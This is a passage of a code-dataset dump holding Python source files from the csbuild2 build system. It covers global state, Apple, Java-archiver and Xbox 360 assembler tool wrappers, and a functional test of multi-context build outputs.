"no_license", "max_line_length": 92, "num_lines": 160, "path": "/csbuild/_utils/shared_globals.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. 
Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: shared_globals\n\t:synopsis: Global variables that need to be accessed by multiple modules\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nfrom . import dag\n\nerrors = []\nwarnings = []\ncolorSupported = False\nlogFile = None\n\ntoolchains = {}\n\nsortedProjects = dag.DAG(lambda x: x.name)\nallTargets = set()\nallToolchains = set()\nallArchitectures = set()\n\nclass GeneratorData(object):\n\t\"\"\"Contains data for a solution generator\"\"\"\n\tdef __init__(self, projectTools, solutionTool):\n\t\tself.projectTools = projectTools\n\t\tself.solutionTool = solutionTool\n\nallGenerators = {}\nallGeneratorTools = set()\n\nsolutionGeneratorType = \"\"\n\nrunPerfReport = None\n\ntoolchainGroups = {}\n\nsolutionPath = \"\"\nsolutionArgs = \"\"\n\nclass RunMode(object):\n\t\"\"\"\n\t'enum' representing the way csbuild has been invoked\n\t\"\"\"\n\tNormal = 0\n\tHelp = 1\n\tVersion = 2\n\tGenerateSolution = 3\n\tGenerateDependencyGraph = 4\n\tQUALAP = 5\n\nrunMode = None\n\ndefaultTarget = \"release\"\n\nparser = None\n\nclass Verbosity(object):\n\t\"\"\"\n\t'enum' representing verbosity\n\t\"\"\"\n\tVerbose = 0\n\tNormal = 1\n\tQuiet = 2\n\tMute = 3\n\n#Has to default to Verbose for tests to print Info since they don't take command line params\nverbosity = Verbosity.Verbose\n\nshowCommands = False\n\nprojectMap = {}\n\nprojectBuildList = []\n\ncommandOutputThread = None\n\ncolumns = 0\nclearBar = \"\"\n\nstartTime = 0\n\ntotalBuilds = 0\ncompletedBuilds = 0\n\nbuildStartedHooks = set()\nbuildFinishedHooks = set()\n\nclass InMemoryOnlySettings(object):\n\t\"\"\"Mockup class for settings_manager.SettingsManager\"\"\"\n\tdef __init__(self):\n\t\tself.dict = {}\n\n\tdef Get(self, key, default=None):\n\t\t\"\"\"\n\t\tGet a value from the dict\n\n\t\t:param key: key\n\t\t:type key: str\n\t\t:param default: value returned if missing\n\t\t:type default: any\n\t\t:return: the value for this key, or default\n\t\t:rtype: any\n\t\t\"\"\"\n\t\treturn self.dict.get(key, default)\n\n\tdef Save(self, key, value):\n\t\t\"\"\"\n\t\tSave a value to the dict\n\n\t\t:param key: The key\n\t\t:type key: str\n\t\t:param value: The value\n\t\t:type value: any\n\t\t\"\"\"\n\t\tself.dict[key] = value\n\n\tdef Persist(self):\n\t\t\"\"\"\n\t\tNOP for this class.\n\t\t\"\"\"\n\t\tpass\n\n\tdef Clear(self):\n\t\t\"\"\"\n\t\tNOP for this 
class.\n\t\t\"\"\"\n\t\tpass\n\n\tdef Delete(self, key):\n\t\t\"\"\"\n\t\tRemove a key from the dict if it exists, nop otherwise\n\n\t\t:param key: key to remove\n\t\t:type key: str\n\t\t\"\"\"\n\t\tself.dict.pop(key, None)\n\nsettings = InMemoryOnlySettings()\n" }, { "alpha_fraction": 0.7656612396240234, "alphanum_fraction": 0.7703016400337219, "avg_line_length": 40.0476188659668, "blob_id": "338d12d14e5462f88ea7865950ba7b1f1928dd8b", "content_id": "5195d84ed564093dab6c613c14ab3ac993be3d07", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1724, "license_type": "no_license", "max_line_length": 117, "num_lines": 42, "path": "/csbuild/_utils/string_abc.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: string_abc\n\t:synopsis: Provides an abstract base class to provide the same role as basestring in a python 2 and 3 compatible way\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport abc\nfrom . import StrType, BytesType\nfrom .decorators import MetaClass\n\n@MetaClass(abc.ABCMeta)\nclass String(object):\n\t\"\"\"\n\tAbstract base class representing both str and bytes in python3, and both unicode and str in python 2.\n\t\"\"\"\n\tpass\n\n#pylint's not very intelligent about the @MetaClass decorator...\n\nString.register(StrType) # pylint: disable=no-member\nString.register(BytesType) # pylint: disable=no-member\n" }, { "alpha_fraction": 0.6429128646850586, "alphanum_fraction": 0.6451235413551331, "avg_line_length": 37.258705139160156, "blob_id": "bc439a6142608f2acbf54ffbf1020d1320cb5043", "content_id": "4fe6742e63cf3c927ddca5af8e6131bbf995c19c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7690, "license_type": "no_license", "max_line_length": 155, "num_lines": 201, "path": "/csbuild/tools/common/apple_tool_base.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. 
Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: apple_tool_base\n\t:synopsis: Abstract base class for macOS tools.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nimport os\nimport re\nimport subprocess\n\nfrom abc import ABCMeta\n\nfrom ..._utils import ordered_set\nfrom ..._utils.decorators import MetaClass\nfrom ...toolchain import Tool\nfrom ... import commands\n\n\ndef _ignore(_):\n\tpass\n\ndef _noLogOnRun(shared, msg):\n\t_ignore(shared)\n\t_ignore(msg)\n\n\nclass AppleHostToolInfo(object):\n\t\"\"\"\n\tClass for maintaining data output by Xcode tools installed on the host OS.\n\t\"\"\"\n\tInstance = None\n\n\tdef __init__(self):\n\t\ttry:\n\t\t\t# Verify the 'xcrun' program exists.\n\t\t\tsubprocess.call([\"xcrun\"], stdout = subprocess.PIPE, stderr = subprocess.PIPE)\n\t\texcept:\n\t\t\traise IOError(\"Program 'xcrun' could not be found; please make sure you have installed Xcode and the command line build tools\")\n\n\t\ttry:\n\t\t\t# Verify the 'xcode-select' program exists.\n\t\t\tsubprocess.call([\"xcode-select\"], stdout = subprocess.PIPE, stderr = subprocess.PIPE)\n\t\texcept:\n\t\t\traise IOError(\"Program 'xcode-select' could not be found; please make sure you have installed Xcode and the command line build tools\")\n\n\t\t_, activeXcodeDevPath, _ = commands.Run([\"xcode-select\", \"-p\"], stdout = _noLogOnRun, stderr = _noLogOnRun)\n\n\t\t_, defaultMacOsSdkPath, _ = commands.Run([\"xcrun\", \"--sdk\", \"macosx\", \"--show-sdk-path\"], stdout = _noLogOnRun, stderr = _noLogOnRun)\n\t\t_, defaultIPhoneOsSdkPath, _, = commands.Run([\"xcrun\", \"--sdk\", \"iphoneos\", \"--show-sdk-path\"], stdout = _noLogOnRun, stderr = _noLogOnRun)\n\t\t_, defaultIPhoneSimSdkPath, _, = commands.Run([\"xcrun\", \"--sdk\", \"iphonesimulator\", \"--show-sdk-path\"], stdout = _noLogOnRun, stderr = _noLogOnRun)\n\n\t\t_, defaultMacOsSdkVersion, _, = commands.Run([\"xcrun\", \"--sdk\", \"macosx\", \"--show-sdk-version\"], stdout = _noLogOnRun, stderr = _noLogOnRun)\n\t\t_, defaultIPhoneOsSdkVersion, _, = commands.Run([\"xcrun\", \"--sdk\", \"iphoneos\", \"--show-sdk-version\"], stdout = _noLogOnRun, stderr = _noLogOnRun)\n\t\t_, defaultIPhoneSimSdkVersion, _, = commands.Run([\"xcrun\", \"--sdk\", \"iphonesimulator\", \"--show-sdk-version\"], stdout = _noLogOnRun, stderr = _noLogOnRun)\n\n\t\tself.activeXcodeToolchainPath = os.path.join(activeXcodeDevPath.strip(), \"Toolchains\", 
\"XcodeDefault.xctoolchain\")\n\n\t\tself.defaultMacOsSdkPath = defaultMacOsSdkPath.strip()\n\t\tself.defaultIPhoneOsSdkPath = defaultIPhoneOsSdkPath.strip()\n\t\tself.defaultIPhoneSimSdkPath = defaultIPhoneSimSdkPath.strip()\n\n\t\tself.defaultMacOsSdkVersion = defaultMacOsSdkVersion.strip()\n\t\tself.defaultIPhoneOsSdkVersion = defaultIPhoneOsSdkVersion.strip()\n\t\tself.defaultIPhoneSimSdkVersion = defaultIPhoneSimSdkVersion.strip()\n\n\n@MetaClass(ABCMeta)\nclass AppleToolBase(Tool):\n\t\"\"\"\n\tParent class for all tools targetting Apple platforms.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tTool.__init__(self, projectSettings)\n\n\t\tself._frameworkDirectories = projectSettings.get(\"frameworkDirectories\", ordered_set.OrderedSet())\n\t\tself._frameworks = projectSettings.get(\"frameworks\", ordered_set.OrderedSet())\n\n\t\t# Add the default library framework locations.\n\t\tself._frameworkDirectories.update([\n\t\t\tx\n\t\t\tfor x in [\n\t\t\t\t\"/Library/Frameworks\",\n\t\t\t\tos.path.expanduser(\"~/Library/Frameworks\"),\n\t\t\t]\n\t\t\tif os.access(x, os.F_OK)\n\t\t])\n\n\t\tself._appleToolInfo = None\n\n\n\t####################################################################################################################\n\t### Static makefile methods\n\t####################################################################################################################\n\n\t@staticmethod\n\tdef AddFrameworkDirectories(*dirs):\n\t\t\"\"\"\n\t\tAdd directories to search for frameworks.\n\n\t\t:param dirs: List of directories\n\t\t:type dirs: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.UnionSet(\"frameworkDirectories\", [os.path.abspath(directory) for directory in dirs])\n\n\t@staticmethod\n\tdef AddFrameworks(*frameworks):\n\t\t\"\"\"\n\t\tAdd frameworks to the current project.\n\n\t\t:param frameworks: List of frameworks.\n\t\t:type frameworks: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.UnionSet(\"frameworks\", frameworks)\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef SetupForProject(self, project):\n\t\tTool.SetupForProject(self, project)\n\n\t\t# Create the mac tool info if the singleton doesn't already exist.\n\t\tif not AppleHostToolInfo.Instance:\n\t\t\tAppleHostToolInfo.Instance = AppleHostToolInfo()\n\n\t\tself._appleToolInfo = AppleHostToolInfo.Instance\n\n\n@MetaClass(ABCMeta)\nclass MacOsToolBase(AppleToolBase):\n\t\"\"\"\n\tParent class for all tools targetting the macOS platform.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tAppleToolBase.__init__(self, projectSettings)\n\n\t\tself._macOsVersionMin = projectSettings.get(\"macOsVersionMin\", None)\n\n\t\t# When a version is not provided, default to the current version of the OS.\n\t\tif not self._macOsVersionMin:\n\t\t\tself._macOsVersionMin = self._getMacOsCurrentVersion()\n\n\n\t####################################################################################################################\n\t### Static makefile 
methods\n\t####################################################################################################################\n\n\tdef SetMacOsVersionMin(self, version):\n\t\t\"\"\"\n\t\tSet the minimum version of macOS to build for.\n\n\t\t:param version: macOS version (e.g., \"10.8\", \"10.9\", \"10.10\", etc)\n\t\t:type version: str\n\t\t\"\"\"\n\t\tself._macOsVersionMin = csbuild.currentPlan.SetValue(\"macOsVersionMin\", version)\n\n\n\t####################################################################################################################\n\t### Internal methods\n\t####################################################################################################################\n\n\tdef _getMacOsCurrentVersion(self):\n\t\tcurrentVersion = subprocess.check_output([\"sw_vers\", \"-productVersion\"]).decode(\"utf-8\")\n\n\t\t# The version number is returned in the \"x.y.z\" format, but we only need \"x.y\".\n\t\tversionRegex = re.compile(r\"(\\d+).(\\d+)\")\n\t\tmatch = versionRegex.match(currentVersion)\n\t\tassert match, f\"Failed to parse macOS version: {currentVersion}\"\n\n\t\treturn f\"{match.group(1)}.{match.group(2)}\"\n" }, { "alpha_fraction": 0.6446098685264587, "alphanum_fraction": 0.6457127332687378, "avg_line_length": 36.01020431518555, "blob_id": "28512cdef26fcfa8194f8a1c1834d5cf8a22fee2", "content_id": "798cfc17342e49286b800dbdd11a4ff28b5ced3f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3627, "license_type": "no_license", "max_line_length": 124, "num_lines": 98, "path": "/csbuild/tools/java_archivers/oracle_java_archiver.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: oracle_java_archiver\n\t:synopsis: Oracle-compatible Java archiver tool.\n\n.. 
moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport platform\nimport os\nimport subprocess\n\nfrom .java_archiver_base import JavaArchiverBase\n\nclass OracleJavaArchiver(JavaArchiverBase):\n\t\"\"\"\n\tOracle-compatible Java archiver implementation.\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tJavaArchiverBase.__init__(self, projectSettings)\n\n\t\tself._javaArchiverPath = os.path.join(self._javaBinPath, \"jar{}\".format(\".exe\" if platform.system() == \"Windows\" else \"\"))\n\n\t\ttry:\n\t\t\tsubprocess.call([self._javaArchiverPath], stdout = subprocess.PIPE, stderr = subprocess.PIPE)\n\t\texcept:\n\t\t\traise IOError(\"Oracle Java archiver not found at path: {}\".format(self._javaArchiverPath))\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef _getOutputFiles(self, project):\n\t\treturn tuple({ self._getOutputFilePath(project) })\n\n\tdef _getCommand(self, project, inputFiles, classRootPath):\n\t\tcmd = [self._javaArchiverPath] \\\n\t\t\t+ self._getSwitchArgs() \\\n\t\t\t+ self._getOutputArgs(project) \\\n\t\t\t+ self._getEntryPointClassArgs() \\\n\t\t\t+ self._getInputArgs(classRootPath)\n\n\t\treturn [arg for arg in cmd if arg]\n\n\n\t####################################################################################################################\n\t### Internal methods\n\t####################################################################################################################\n\n\tdef _getOutputFilePath(self, project):\n\t\treturn os.path.join(project.outputDir, \"{}.jar\".format(project.outputName))\n\n\tdef _getOutputArgs(self, project):\n\t\treturn [self._getOutputFilePath(project)]\n\n\tdef _getSwitchArgs(self):\n\t\t# Append the \"e\" switch only when an entry point class is provided; always keep \"cf\".\n\t\treturn [\"cf\" + (\"e\" if self._entryPointClass else \"\")]\n\n\tdef _getEntryPointClassArgs(self):\n\t\treturn [self._entryPointClass] if self._entryPointClass else []\n\n\tdef _getInputArgs(self, classRootPath):\n\t\trootItems = os.listdir(classRootPath)\n\t\targs = []\n\n\t\t# Pass in only the items in the class root directory since the Java archiver\n\t\t# will recursively find class files in directories. This is important so the\n\t\t# layout of the files in the final archive has the correct directory structure.\n\t\tfor item in rootItems:\n\t\t\targs.extend([\n\t\t\t\t\"-C\",\n\t\t\t\tclassRootPath,\n\t\t\t\titem\n\t\t\t])\n\n\t\treturn args\n" }, { "alpha_fraction": 0.6346724033355713, "alphanum_fraction": 0.6443785429000854, "avg_line_length": 34.66345977783203, "blob_id": "0d1bbf0bd9facf9235fd38fab3955530488501a1", "content_id": "f96425d58039ca5ffa78fa6cd2fde6c9236a8ee0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3709, "license_type": "no_license", "max_line_length": 131, "num_lines": 104, "path": "/csbuild/tools/assemblers/xbox_360_assembler.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. 
Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: xbox_360_assembler\n\t:synopsis: Xbox 360 assembler tool\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\n\nfrom .assembler_base import AssemblerBase\nfrom ..common.tool_traits import HasDebugLevel\nfrom ..common.xbox_360_tool_base import Xbox360BaseTool\n\nDebugLevel = HasDebugLevel.DebugLevel\n\nclass Xbox360Assembler(Xbox360BaseTool, AssemblerBase):\n\t\"\"\"\n\tXbox 360 assembler implementation.\n\t\"\"\"\n\tsupportedPlatforms = {\"Windows\"}\n\tsupportedArchitectures = {\"xcpu\"}\n\tinputFiles={\".asm\"}\n\toutputFiles = {\".obj\"}\n\n\tdef __init__(self, projectSettings):\n\t\tXbox360BaseTool.__init__(self, projectSettings)\n\t\tAssemblerBase.__init__(self, projectSettings)\n\n\t\tself._exePath = None\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef _getOutputFiles(self, project, inputFile):\n\t\toutputPath = os.path.join(project.GetIntermediateDirectory(inputFile), os.path.splitext(os.path.basename(inputFile.filename))[0])\n\n\t\treturn tuple({ \"{}.obj\".format(outputPath) })\n\n\tdef _getCommand(self, project, inputFile):\n\t\tcmd = [self._exePath] \\\n\t\t\t+ self._getDefaultArgs() \\\n\t\t\t+ self._getDebugArgs() \\\n\t\t\t+ self._getPreprocessorArgs() \\\n\t\t\t+ self._getIncludeDirectoryArgs() \\\n\t\t\t+ self._asmFlags \\\n\t\t\t+ self._getOutputFileArgs(project, inputFile) \\\n\t\t\t+ [inputFile.filename]\n\n\t\treturn [arg for arg in cmd if arg]\n\n\tdef SetupForProject(self, project):\n\t\tXbox360BaseTool.SetupForProject(self, project)\n\t\tAssemblerBase.SetupForProject(self, project)\n\n\t\tself._exePath = os.path.join(self._xbox360BinPath, \"ml.exe\")\n\n\n\t####################################################################################################################\n\t### Internal methods\n\t####################################################################################################################\n\n\tdef _getDefaultArgs(self):\n\t\targs = [\"/nologo\", \"/c\"]\n\t\treturn args\n\n\tdef _getDebugArgs(self):\n\t\targs = [] if self._debugLevel == DebugLevel.Disabled else [\"/Zi\", \"/Zd\"]\n\t\treturn args\n\n\tdef 
_getPreprocessorArgs(self):\n\t\tdefineArgs = [\"/D{}\".format(d) for d in self._defines]\n\t\treturn defineArgs\n\n\tdef _getIncludeDirectoryArgs(self):\n\t\targs = [\"/I{}\".format(directory) for directory in self._includeDirectories]\n\t\treturn args\n\n\tdef _getOutputFileArgs(self, project, inputFile):\n\t\toutputFiles = self._getOutputFiles(project, inputFile)\n\t\treturn [\"/Fo\", outputFiles[0]]\n" }, { "alpha_fraction": 0.7368895411491394, "alphanum_fraction": 0.7538295388221741, "avg_line_length": 55.6224479675293, "blob_id": "7601f1477383314c2c455927f8fd62dfff1e8888", "content_id": "77a73a2de1a5724300d39462c2e3dd32fed03453", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5549, "license_type": "no_license", "max_line_length": 109, "num_lines": 98, "path": "/functional_tests/multi_context_test/tests.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: tests\n\t:synopsis: Test for MultiContexts\n\n.. moduleauthor:: Jaedyn K. 
Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nfrom csbuild._testing.functional_test import FunctionalTest\n\nclass MultiContextTest(FunctionalTest):\n\t\"\"\"Multi context test\"\"\"\n\t# pylint: disable=invalid-name\n\tdef runTest(self, projectName):\n\t\t\"\"\"Multi context test\"\"\"\n\t\tself.assertMakeSucceeds(\"--ao\", \"--aa\", \"--at\", \"--project\", projectName)\n\n\t\tfor i in range(1, 11):\n\t\t\t# debug/foo - both create this output scheme\n\t\t\tself.assertFileContents(\"./intermediate/FirstThree/debug/foo/AddDoubles/{}.second\".format(i), str(i*2))\n\t\t\tself.assertFileContents(\"./intermediate/FirstThree/debug/foo/AddDoubles2/{}.second\".format(i), str(i*2))\n\t\t\tself.assertFileContents(\"./intermediate/FirstThree/debug/foo/AddDoubles3/{}.second\".format(i), str(i*2))\n\t\t\tself.assertFileContents(\"./intermediate/FirstThree/debug/foo/AddDoubles4/{}.second\".format(i), str(i*2))\n\n\t\t\t# debug/bar - debug creates this output scheme\n\t\t\tself.assertFileContents(\"./intermediate/FirstThree/debug/bar/AddDoubles/{}.second\".format(i), str(i*2))\n\t\t\tself.assertFileContents(\"./intermediate/FirstThree/debug/bar/AddDoubles2/{}.second\".format(i), str(i*2))\n\t\t\tself.assertFileContents(\"./intermediate/FirstThree/debug/bar/AddDoubles3/{}.second\".format(i), str(i*2))\n\t\t\tself.assertFileContents(\"./intermediate/FirstThree/debug/bar/AddDoubles4/{}.second\".format(i), str(i*2))\n\n\t\t\t# release/foo - foo creates this output scheme\n\t\t\tself.assertFileContents(\"./intermediate/FirstThree/release/foo/AddDoubles/{}.second\".format(i), str(i*2))\n\t\t\tself.assertFileContents(\"./intermediate/FirstThree/release/foo/AddDoubles2/{}.second\".format(i), str(i*2))\n\t\t\tself.assertFileContents(\"./intermediate/FirstThree/release/foo/AddDoubles3/{}.second\".format(i), str(i*2))\n\t\t\tself.assertFileContents(\"./intermediate/FirstThree/release/foo/AddDoubles4/{}.second\".format(i), str(i*2))\n\n\t\t\t# release/bar - FirstThree toolchain group creates this output scheme, fourth toolchain will be default\n\t\t\tself.assertFileContents(\"./intermediate/FirstThree/release/bar/AddDoubles/{}.second\".format(i), str(i*2))\n\t\t\tself.assertFileContents(\"./intermediate/FirstThree/release/bar/AddDoubles2/{}.second\".format(i), str(i*2))\n\t\t\tself.assertFileContents(\"./intermediate/FirstThree/release/bar/AddDoubles3/{}.second\".format(i), str(i*2))\n\t\t\tself.assertFileContents(\"./intermediate/{}.second\".format(i), str(i*2))\n\n\t\t#debug/foo - foo forces fooFoo.third output name, LastThree toolchain group creates output directory scheme\n\t\tself.assertFileContents(\"./out/fooFoo.third\", \"110\")\n\t\tself.assertFileContents(\"./out/LastThree/debug/foo/AddDoubles2/fooFoo.third\", \"110\")\n\t\tself.assertFileContents(\"./out/LastThree/debug/foo/AddDoubles3/fooFoo.third\", \"110\")\n\t\tself.assertFileContents(\"./out/LastThree/debug/foo/AddDoubles4/fooFoo.third\", \"110\")\n\n\t\t#debug/bar - AddDoubles forces barFoo.third output name, bar creates output directory scheme\n\t\tself.assertFileContents(\"./out/LastThree/debug/bar/AddDoubles/barFoo.third\", \"110\")\n\t\tself.assertFileContents(\"./out/LastThree/debug/bar/AddDoubles2/Foo.third\", \"110\")\n\t\tself.assertFileContents(\"./out/LastThree/debug/bar/AddDoubles3/Foo.third\", \"110\")\n\t\tself.assertFileContents(\"./out/LastThree/debug/bar/AddDoubles4/Foo.third\", \"110\")\n\n\t\t#release/foo - release creates output directory scheme, foo forces fooFoo.third output 
name\n\t\tself.assertFileContents(\"./out/LastThree/release/foo/AddDoubles/fooFoo.third\", \"110\")\n\t\tself.assertFileContents(\"./out/LastThree/release/foo/AddDoubles2/fooFoo.third\", \"110\")\n\t\tself.assertFileContents(\"./out/LastThree/release/foo/AddDoubles3/fooFoo.third\", \"110\")\n\t\tself.assertFileContents(\"./out/LastThree/release/foo/AddDoubles4/fooFoo.third\", \"110\")\n\n\t\t#release/bar - release creates output directory scheme, AddDoubles forces barFoo.third output name\n\t\tself.assertFileContents(\"./out/LastThree/release/bar/AddDoubles/barFoo.third\", \"110\")\n\t\tself.assertFileContents(\"./out/LastThree/release/bar/AddDoubles2/Foo.third\", \"110\")\n\t\tself.assertFileContents(\"./out/LastThree/release/bar/AddDoubles3/Foo.third\", \"110\")\n\t\tself.assertFileContents(\"./out/LastThree/release/bar/AddDoubles4/Foo.third\", \"110\")\n\n\t\tself.cleanArgs = [\"--ao\", \"--aa\", \"--at\"]\n\n\n\tdef testWithSyntax(self):\n\t\t\"\"\"Run the test using the 'with' syntax\"\"\"\n\t\tself.runTest(\"TestProject\")\n\n\n\tdef testChaining(self):\n\t\t\"\"\"Run the test using chained context 